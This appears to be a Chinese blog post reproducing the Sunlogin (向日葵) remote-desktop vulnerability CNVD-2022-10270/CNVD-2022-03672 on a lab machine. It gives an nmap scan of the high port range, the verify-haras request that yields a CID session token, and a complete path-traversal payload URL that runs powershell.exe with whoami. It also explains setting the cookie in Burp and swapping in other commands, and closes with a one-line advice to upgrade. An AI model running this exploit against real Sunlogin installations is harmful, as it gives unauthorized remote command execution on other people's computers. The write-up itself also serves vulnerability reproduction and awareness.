向日葵CNVD-2022-10270/CNVD-2022-03672 復(fù)現(xiàn)
向日葵是生活工作中最常用的一款遠(yuǎn)程辦公工具之一。也是目前國內(nèi)市面上用的最多的一款工具。本文來談?wù)勱P(guān)于其
CNVD-2022-10270/CNVD-2022-03672
漏洞的利用和復(fù)現(xiàn)。
實驗環(huán)境
向日葵 <= 11.0.0.33
Kali Linux
端口掃描
我們首先在本地環(huán)境安裝11.0.0.33
的低版本向日葵。安裝完成后,并用nmap對靶場進(jìn)行端口掃描。

安裝完成后,在kali中利用nmap端口掃描。
nmap?-p?45000-55000?192.168.50.105
如下圖,我們可以看到目標(biāo)存在61376
61387
這幾個端口。

當(dāng)然,為了方便我們可以利用python腳本快速檢測,支持整個網(wǎng)段掃描。

漏洞復(fù)現(xiàn)
在瀏覽器中訪問ip
+端口號
+cgi-bin/rpc?action=verify-haras (端口號:每一個都嘗試,直到獲取到session值CID
)

通過上述方法,我們確定了目標(biāo)的端口。現(xiàn)在我們便可以利用payload工具進(jìn)行測試。payload
http://192.168.50.105:61387/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+whoami
訪問paylaod,并在burp中進(jìn)行抓包。

修改Cookie:YqRx8XziEo3PCASesFfsfP5tZWk344Zl
為Cookie: CID=YqRx8XziEo3PCASesFfsfP5tZWk344Zl
效果如下:

同樣,我們只需修改后面的whoami
為其他的命令如ipconfig
即可。


安全建議
此漏洞算是比較高危的漏洞,請盡快更新到最新版本。
更多精彩文章 歡迎關(guān)注微信公眾號 kali黑客筆記